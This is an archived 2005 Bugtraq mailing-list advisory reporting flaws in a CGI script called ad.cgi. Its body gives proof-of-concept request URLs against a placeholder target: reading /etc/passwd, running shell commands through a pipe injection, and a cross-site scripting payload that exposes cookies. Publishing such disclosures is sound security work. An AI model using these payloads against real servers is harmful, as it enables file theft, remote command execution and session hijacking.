[38584] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

remote command execution in ad.cgi script

daemon@ATHENA.MIT.EDU (fireboy fireboy)
Mon Apr 25 17:00:08 2005

Date: 24 Apr 2005 21:06:47 -0000
Message-ID: <20050424210647.29139.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: fireboy fireboy <fireboynet@webmails.com>
To: bugtraq@securityfocus.com



Tunis 24/04/2005
BUG found by fireboy
fireboy@webmails.com



THERE ARE SOME BUGS IN 	ad.cgi SCRIPT THAT CAN SHOW SENSILBLES FILES IN A SYSTEM 
OR EXECUTE COMMANDS IN THE TARGET HOST WICH CAN COMPROMISE IT.

IT IS ONLY FOR SECURITY AND EDUCATIONAL PURPOSE 


1)file showing
http://www.target.com/cgi-bin/ad.cgi?/etc/passwd

2)remote code execution
http://www.target.com/cgi-bin/ad.cgi?|command

3)CSS
www.target.com/cgi-bin/ad.cgi?&lt;script&gt;alert(document.cookie)&lt;/script&gt;

ex:
http://www.target.com/cgi-bin/ad.cgi?|ls;uname -a;



greetz to all magattack members www.magattack.tk


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[38584] in bugtraq

remote command execution in ad.cgi script

daemon@ATHENA.MIT.EDU (fireboy fireboy)Mon Apr 25 17:00:08 2005

daemon@ATHENA.MIT.EDU (fireboy fireboy)
Mon Apr 25 17:00:08 2005